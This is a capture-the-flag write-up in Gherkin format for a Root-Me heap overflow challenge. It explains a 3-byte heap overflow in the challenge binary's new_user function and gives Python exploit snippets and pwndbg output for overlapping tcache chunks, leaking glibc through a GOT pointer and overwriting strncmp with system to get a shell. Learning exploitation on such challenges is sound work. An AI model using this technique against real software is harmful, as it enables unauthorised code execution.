## Version 2.0
## language: en

Feature: elf64-remote-heap-buffer-overflow-1
  Site:
    rootme
  Category:
    app-system
  User:
    M'baku
  Goal:
    Get shell and read the password

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | GDB-pwndbg      | 1.1.0     |
    | Python          | 3.6.9     |
    | Xshell          | 6.0       |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then a program source code is delivered

  Scenario: Success: Finding the bugs in the source code
    Given the source code is delivered
    When I identify a function "process_cmd"
    Then this function is in charge of managing the operations of the program
    """
    void process_cmd(char *buffer, int len) {
        char *p;

        if(!strncmp(buffer, "free ", 5)) {
            free_user(get_id(buffer+5));
        } else if(!strncmp(buffer, "new ", 4)) {
            new_user(buffer+4, len-4);
        } else if(!strncmp(buffer, "show", 4)) {
            show_users();
        } else if(!strncmp(buffer, "modif ", 6)) {
            if((p = strchr(buffer+6, ' '))) {
                *(p++) = 0;
                modif_user(p, get_id(buffer+6), len-(p-buffer+1));
            }
        } else {
            printf("Invalid command : <%s>\n", buffer);
        }
    }
    """
    When I analyzed the functions
    """
    new_user()
    free_user()
    show_users()
    modif_user()
    """
    Then I found a bug in the "new_user" function [evidences](bug.png)
    And this bug is a 3 bytes Heap Overflow
    """
    void new_user(char *buffer, int len) {

        if(num_users >= MAX_USERS)
            return;

        if((user_list[num_users] = malloc(sizeof(user_t))) == NULL)
            err(EXIT_FAILURE, "out of memory");
        if((user_list[num_users]->name = malloc(len+1)) == NULL)
            err(EXIT_FAILURE, "out of memory");

        strcpy(user_list[num_users]->name, "U__");
        memcpy(user_list[num_users]->name+3, buffer, len);

        user_list[num_users]->name[len + 3] = 0;
        user_list[num_users]->name_len = len+3+1;

        genere_id(user_list[num_users]);
        num_users++;
    }
    """
    When I analyzed this function I see that it initialize two pointers to heap
    """
    user_list[num_users] = malloc(sizeof(user_t)
    user_list[num_users]->name = malloc(len+1)
    """
    Then the first one initializes the structure for each user
    """
    #define MAX_USERS 50

    typedef struct user {
        char *name;
        int name_len;
        char id[128];
    }user_t;

    user_t *user_list[MAX_USERS];
    int num_users = 0;
    """
    Then the second one stores username
    """
    strcpy(user_list[num_users]->name, "U__");
    memcpy(user_list[num_users]->name+3, buffer, len);
    """
    And here lies the bug because before copying the user (buffer) adds "U__"
    Then with memcpy copies the buffer into the position 3
    """
    memcpy(user_list[num_users]->name+3, buffer, len);
    """
    And if the buffer contains a number of bytes large enough to fill the chunk
    Then it is possible to overflow 3 bytes of the chunk
    And overwrite the size of the next chunk in memory

  Scenario: Success: Overlapping chunks
    Given it is possible to overwrite the size of a contiguous chunk in memory
    And it is possible to allocate chunks of arbitrary size
    Then the idea is to overlap two chunks to control the user structure
    """
        0x157               0x150         0x150
    +--------------------+------------+----------+
    | chunk 1 (overflow) | chunk 2    | chunk 3  |
    +--------------------+------------+----------+
    """
    When I modify the size of chunk 2 to a value that can contain chunk 3
    """
    new(b'A' * 0x155 + b'\x41\x02') # 0x241 (new size of chunk 2)
    """
    And by freed it he will go to Tcache bins with his new size
    """
    pwndbg> bins
    tcachebins
    0x160 [  1]: 0x1cc3910 ◂— 0x0
    0x240 [  1]: 0x1cc3870 ◂— 0x0
    fastbins
    0x20: 0x0
    ...
    pwndbg>
    """
    When requesting a chunk of size 0x241
    Then I would get a chunk that contains the two chunks
    """
                                 0x241
                         +-----------------------+
            0x157        |       chunk 2         |
    +--------------------+------------+----------+
    | chunk 1 (overflow) |            | chunk 3  |
    +--------------------+------------+----------+
    """

  Scenario: Success: Leaking Glibc
    Given it is possible to perform overlapping
    When my idea is to leak Libc pointers
    And thanks to overlap I can overwrite the structure of chunk 3
    """
    typedef struct user {
        char *name;
        int name_len;
        char id[128];
    }user_t;
    """
    And modify the name pointer for a GOT address
    Then I used GDB to get the pointer
    """
    pwndbg> got
    ...
    [0x602028] strncmp@GLIBC_2.2.5 -> 0x400836 (strncmp@plt+6) <- push   2
    ...
    pwndbg>
    """
    And I use Python to get the leak
    """
    got = 0x602028 # strncmp

    new(b'C' * 0x1fd + p64(got) + b'C' * 43)

    show()

    # Leak Glibc
    strncmp_leak = u64(user_names.get('0').ljust(8, b'\x00'))
    libc = strncmp_leak - 0x185780
    system = libc + 0x4f4e0
    """
    Then this works because instead of printing the name it prints strncmp()

  Scenario: Success: Getting shell
    Given I have managed to leak Libc
    And control of the user structure in a specific chunk (chunk 3)
    Then it is enough just to overwrite the GOT with a call to system()
    """
    strncmp() -> system()
    """
    And I used the function modif for that
    """
    modif(user_ids.get('0'), p64(system))
    p.sendline('sh')

    # strncmp('sh') -> system('sh')
    """
    Then in this way I was able to exploit the binary [evidences](pwned.png)
